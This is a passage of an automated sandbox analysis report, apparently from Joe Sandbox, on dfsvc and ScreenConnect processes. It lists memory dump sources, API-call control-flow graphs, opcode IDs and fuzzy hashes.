                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 1182 7ffd9b8a994b-7ffd9b8a99e0 1186 7ffd9b8a99ea-7ffd9b8a9a8a CreateFileW 1182->1186 1187 7ffd9b8a99e2-7ffd9b8a99e7 1182->1187 1189 7ffd9b8a9a8c 1186->1189 1190 7ffd9b8a9a92-7ffd9b8a9ac5 1186->1190 1187->1186 1189->1190
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000001.00000002.2642164148.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_dfsvc.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                  • Opcode ID: 49b43e95b58114766ab6d13bd56b2fa4d419cefe785d5dfa23e54be9179ae96b
                                                                                                                                                                                                                  • Instruction ID: 9abb6a625b82d0f897a2aa9f14c16793a1183d310236aca1eceaf6e6c942462f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49b43e95b58114766ab6d13bd56b2fa4d419cefe785d5dfa23e54be9179ae96b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25519F31A0CA5C8FDB68DF589855BE9BBE0FB59310F1442AEE04DD3252CB34A9558B81
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000001.00000002.2641752772.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b78d000_dfsvc.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: d1bec9b56c33262ba82616a1b99b82364fd07fbf30498e79b09cfb3a7aa8df94
                                                                                                                                                                                                                  • Instruction ID: d6e23199647729c049950e5746aca97d3b80db4f4f073f1281391c935083c37a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1bec9b56c33262ba82616a1b99b82364fd07fbf30498e79b09cfb3a7aa8df94
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0441263190EFC84FE3969B2898959523FF0EF46325B0502DFD088CB1A3D729A846C792

                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                  Execution Coverage:13.4%
                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                  Total number of Nodes:12
                                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                                  execution_graph 12045 7ffd9b8a84b8 12046 7ffd9b8a84f6 SetProcessMitigationPolicy 12045->12046 12047 7ffd9b8a8552 12046->12047 12048 7ffd9b8a43b8 12049 7ffd9b8a43c1 GetTokenInformation 12048->12049 12051 7ffd9b8bf2d7 12049->12051 12037 7ffd9b8a3dfa 12038 7ffd9b8bf470 CloseHandle 12037->12038 12040 7ffd9b8bf4eb 12038->12040 12041 7ffd9b8af67b 12042 7ffd9b8af687 CreateFileW 12041->12042 12044 7ffd9b8af7bc 12042->12044

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000009.00000002.1968175510.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: L
                                                                                                                                                                                                                  • API String ID: 0-2909332022
                                                                                                                                                                                                                  • Opcode ID: f81d2a547930ac411271227b63162839abdd64cb10173397ebe280abcc834b3e
                                                                                                                                                                                                                  • Instruction ID: 142dcc7adf867a4dc429b10a43148894d70d160dfc907186bb7d48500b5ea3ea
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f81d2a547930ac411271227b63162839abdd64cb10173397ebe280abcc834b3e
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1832D963A0FBC90FEB25479C68251747F91EF9675071D42FFE088471FBA81AAE068391

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 309 7ffd9b8af67b-7ffd9b8af710 314 7ffd9b8af71a-7ffd9b8af7ba CreateFileW 309->314 315 7ffd9b8af712-7ffd9b8af717 309->315 317 7ffd9b8af7bc 314->317 318 7ffd9b8af7c2-7ffd9b8af7f5 314->318 315->314 317->318
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000009.00000002.1968175510.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                  • Opcode ID: 2a7644612495f3298d75aeaf83b840f23f4cbb963ae7794a55020e9157943901
                                                                                                                                                                                                                  • Instruction ID: b80d28b8233033ee2eed48a1c474ee4f49babcf89795d3fee3dca10bf37365f5
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a7644612495f3298d75aeaf83b840f23f4cbb963ae7794a55020e9157943901
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB51A171A0CA5C8FDB68DF58D845BE8BBE0FB59310F1442AEE04DD3252CB34A945CB81

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 320 7ffd9b8a3eaa-7ffd9b8a84ef 322 7ffd9b8a84f6-7ffd9b8a8550 SetProcessMitigationPolicy 320->322 323 7ffd9b8a8558-7ffd9b8a8587 322->323 324 7ffd9b8a8552 322->324 324->323
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000009.00000002.1968175510.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                                                                                  • Opcode ID: 73c2d40f2bc0fb58d49ac08a5a669f696aecfa8ce0e2d399c86b24d15f66b6fb
                                                                                                                                                                                                                  • Instruction ID: ccd3274ae753aa3898b105231c179a33868ae0b1063be7e60eb99cce0d71fbe8
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 73c2d40f2bc0fb58d49ac08a5a669f696aecfa8ce0e2d399c86b24d15f66b6fb
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E921E67191CB188FDB28AF9CDC4AAF97BE0EB59711F00413EE04AD3251DB74B8468B91

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 326 7ffd9b8a84b8-7ffd9b8a8550 SetProcessMitigationPolicy 328 7ffd9b8a8558-7ffd9b8a8587 326->328 329 7ffd9b8a8552 326->329 329->328
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000009.00000002.1968175510.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                                                                                  • Opcode ID: 17bdcef4d71634405ec4fcc2c7358be489973f3357f317704507961a28564e9c
                                                                                                                                                                                                                  • Instruction ID: 3cf73bacd08582362f462df11427339d1c0d1fbfec353067d7f4b7f4d1c1501e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17bdcef4d71634405ec4fcc2c7358be489973f3357f317704507961a28564e9c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2531F73091CB188FDB28DF9C9C4A9F97BE0EB59711F00412FE449D3251DB74A845CB92

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 429 7ffd9b8a3dfa-7ffd9b8bf4e9 CloseHandle 432 7ffd9b8bf4eb 429->432 433 7ffd9b8bf4f1-7ffd9b8bf51f 429->433 432->433
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000009.00000002.1968175510.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                  • Opcode ID: a8b2e2f28c154821a2929b0fa69c1c0d144b4aad182a898519a9b0c0c04fe054
                                                                                                                                                                                                                  • Instruction ID: 7136d6663835d722ef1d5286734050a3132c16a22e9695a6422c2c372624d677
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8b2e2f28c154821a2929b0fa69c1c0d144b4aad182a898519a9b0c0c04fe054
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4121D331A08A1C9FDB5CDF98D449BF9BBE0EB69321F10422ED04DD3651DB74A856CB90
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: $kq$$kq
                                                                                                                                                                                                                  • API String ID: 0-3550614674
                                                                                                                                                                                                                  • Opcode ID: 8d2d9a05f6fb365f91b296d325a7696c2406daeed26401ca352bb5fa756e5d93
                                                                                                                                                                                                                  • Instruction ID: dc7b2f9c979c36ace3c3d03f94b218fb6469fa4127b1bf0f8c724cd1ad7dc5d8
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d2d9a05f6fb365f91b296d325a7696c2406daeed26401ca352bb5fa756e5d93
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA01A730B053448FC31A9B74D81C6153FB5EF8A711B1A44DAE905CB2A2DB35DC01CB55
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: (oq
                                                                                                                                                                                                                  • API String ID: 0-3175707579
                                                                                                                                                                                                                  • Opcode ID: 56f6cb88fb14d397495ea6df2ff8c50491a3b3fc82031d496d3fdce65e980567
                                                                                                                                                                                                                  • Instruction ID: 929e54ae8bcf16ddc93d2f1d82f43aea953d275dc18ed52f77dda8ad6bc46f1d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56f6cb88fb14d397495ea6df2ff8c50491a3b3fc82031d496d3fdce65e980567
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D711435B106058FCB14DFA8D894A6EBBB2FF89305B1580A9E506EB365DB30ED01DF80
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: LRkq
                                                                                                                                                                                                                  • API String ID: 0-1052062081
                                                                                                                                                                                                                  • Opcode ID: ae4bb8dab3e7e12c7222680276d8c34bb0a72bd7a10808a24180219deb23a86e
                                                                                                                                                                                                                  • Instruction ID: 802877df68303e23fc8d7cf636d92e80706631b58bfa4248780d86e5543cbf1c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae4bb8dab3e7e12c7222680276d8c34bb0a72bd7a10808a24180219deb23a86e
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8351F170B002159FDB259B68D964B6EBBF2EFC4310F18856AE406DB2A5EB31DD44CBC1
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: (oq
                                                                                                                                                                                                                  • API String ID: 0-3175707579
                                                                                                                                                                                                                  • Opcode ID: 8a9bdfc3e3c6add0d0f1084836b5a2450f7f7a377cfa9bdd3b78ac78ad3a0cf9
                                                                                                                                                                                                                  • Instruction ID: abcfe96cbda699a9dbf4eaf3747e8c17aaf957c25227761f496606fb6efad7ba
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a9bdfc3e3c6add0d0f1084836b5a2450f7f7a377cfa9bdd3b78ac78ad3a0cf9
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50418E31A00105CBCB15EF68E598A6EBFB6EFC4310F18C569D905DB359DB34E906CB90
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: ['
                                                                                                                                                                                                                  • API String ID: 0-410297704
                                                                                                                                                                                                                  • Opcode ID: a40b76a9599f29c66f21886f5a633b2e55cfd0aeb9b705af9c0b6ab7645d3e0d
                                                                                                                                                                                                                  • Instruction ID: a9bab79a2a1a75e84eb8b77f354139a7cadcc4c6d6eaed3bb190c1513cf8733f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a40b76a9599f29c66f21886f5a633b2e55cfd0aeb9b705af9c0b6ab7645d3e0d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9831E1317027015FCB01AB7CA89556EBBEAFBC92507448928E91ADB344EF74ED088BD0
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 6a59ca726c9f44dbff2300fd2ebbaf59affa5fd365721cb30f6ef68174a00443
                                                                                                                                                                                                                  • Instruction ID: aa47d27ce385d3fb8479a5e1e9a8b927a60d0b2382cc6eb452843c7a3ab56bc6
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a59ca726c9f44dbff2300fd2ebbaf59affa5fd365721cb30f6ef68174a00443
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C551D071E103198FDB01DFB8D955BDDBBB5EF89300F14815AE404AB3A4EB749989CB90
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 4f837e35c740418ca086de489b57902ca2ad505106c83d4ae4f44736a235302e
                                                                                                                                                                                                                  • Instruction ID: 4bef2ab85bed3936fedfbc72ae68cbecda4ab370eee63e72be68123c8fa8d48b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f837e35c740418ca086de489b57902ca2ad505106c83d4ae4f44736a235302e
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC51CD30E003098FDB01DFB8D844B9DBBB5FF88310F109159E404AB2A5DB75A989CB90
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: d3d5638ce6501b1ac4986ff1ee674d3c0b11649cda1c00a2ba631e802c19ab83
                                                                                                                                                                                                                  • Instruction ID: 76373b7794c5957b7ad9c85d91ad18c4a7834e6075ff61763b777bf619d7bbb2
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3d5638ce6501b1ac4986ff1ee674d3c0b11649cda1c00a2ba631e802c19ab83
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1351F9352006018FC724CF29D884A56B7F2FF89324B288A5CE496DB7A4DB31E946CF84
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 9201d6fec7b2bac7c766efa7c38c994fb53c42b6b03eab085d4a1b84eb77d839
                                                                                                                                                                                                                  • Instruction ID: 934aaecd054afbc9210eb72d22e88ebf9a745adcbd4c54380fa534cb7e65195f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9201d6fec7b2bac7c766efa7c38c994fb53c42b6b03eab085d4a1b84eb77d839
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD517E746007058FCB35CF29D844A5ABBF1FF84321B188A69D856C77A5EB30E945CB90
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 43759659a11320d5d248c0174d5908ed9a59eb3968093a8976322fc0cfaba8b9
                                                                                                                                                                                                                  • Instruction ID: 9f9820ad2da72780e68fa8bf3828f2aa0e5b1b631363541f722439f7793ec6c1
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43759659a11320d5d248c0174d5908ed9a59eb3968093a8976322fc0cfaba8b9
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F24184746007098FCB35DF39D944A5ABBF1FF88321B148A28D456DB7A5DB30E945CB90
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 90229648653c62dd74f1060b66aa765963dae5ba23aca4368c6935e25af87e13
                                                                                                                                                                                                                  • Instruction ID: b67eecf3312be7b3f23ce61373120da964551ef7c92367eeaf3d8b89f5703201
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90229648653c62dd74f1060b66aa765963dae5ba23aca4368c6935e25af87e13
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4415F746007098FCB35CF39D944A6ABBF1FF88311B148A28D856CB7A5EB30E945CB90
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 9c13e64475bb64c86476781d3491baa8436829d5bb93fb718fd2acfd5f478aff
                                                                                                                                                                                                                  • Instruction ID: 22bba1462ca87c795e435c817be004a6c9799bea15774939b1e54fa2993364ab
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c13e64475bb64c86476781d3491baa8436829d5bb93fb718fd2acfd5f478aff
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50315C32B002068FDB149E69C494AAFFBF5EFC9354F14846AE906E7754DB71DD018BA0
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 11a9df36fc163a5268046be8ef5e8b25570529e761798af8b96143806ed535d1
                                                                                                                                                                                                                  • Instruction ID: 68dd4ef5f03738073b52eec82f117b3e31b33b54266c27739492190d5b5297e1
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11a9df36fc163a5268046be8ef5e8b25570529e761798af8b96143806ed535d1
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5621975B80D3C84BCB179635894F1A46F2469C336475D85CFCAC4CB363D495AB8AE3A1
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 5118b21231ceda5beeed6c5218eda2eccb976ddaf3a87d3e62b0e41be7508ebc
                                                                                                                                                                                                                  • Instruction ID: da4455e2d9b5329bd372d13437344a63b73496bf75a3498961fe632ec36cccf4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5118b21231ceda5beeed6c5218eda2eccb976ddaf3a87d3e62b0e41be7508ebc
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C731CC71F042498FCB05DA6CC85466EFBB6FFC9310B1481AAD908EB395DA31EE01C791
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: e297e6e68ddda344ef3c3abeae62f59eb5b24763a9a1fc7d364ad4deac7a23bb
                                                                                                                                                                                                                  • Instruction ID: f64bf8b0cde70abfcb052c4c7d8113be17360baa4b1c242bbd71b46f0a51c6ad
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e297e6e68ddda344ef3c3abeae62f59eb5b24763a9a1fc7d364ad4deac7a23bb
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4314A74600B058FC730CF29D884A6AB7F2EF89324B184A2DE456DB7A5E730E905CBD1
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: f2cee64213c178b7dfbfd65129d2768167aba26ac41ad9cc7e5926f6fd45a654
                                                                                                                                                                                                                  • Instruction ID: 7041baa0043f00df96d62af01de500f383d8ed911bedc86c9c8ba88d778f23c6
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2cee64213c178b7dfbfd65129d2768167aba26ac41ad9cc7e5926f6fd45a654
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30315231A0010ADFCF04DFA8D9449CDBBB6FF89314F158455E505BB265D7356E06CB90
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 052514445d6e0f84aee5c4e6e8683c253905bd2b08dc4e32b1d53a031f036ad2
                                                                                                                                                                                                                  • Instruction ID: 7d0b3e91878bb8659afd3bc57f4b0665864ca6b28e1ed4e316ba370a6346433f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 052514445d6e0f84aee5c4e6e8683c253905bd2b08dc4e32b1d53a031f036ad2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3911D2317012456BCB01EB78E89166EBBA6EFC1210F448525E509EB358DF70AD09CBE1
                                                                                                                                                                                                                  Memory Dump Source
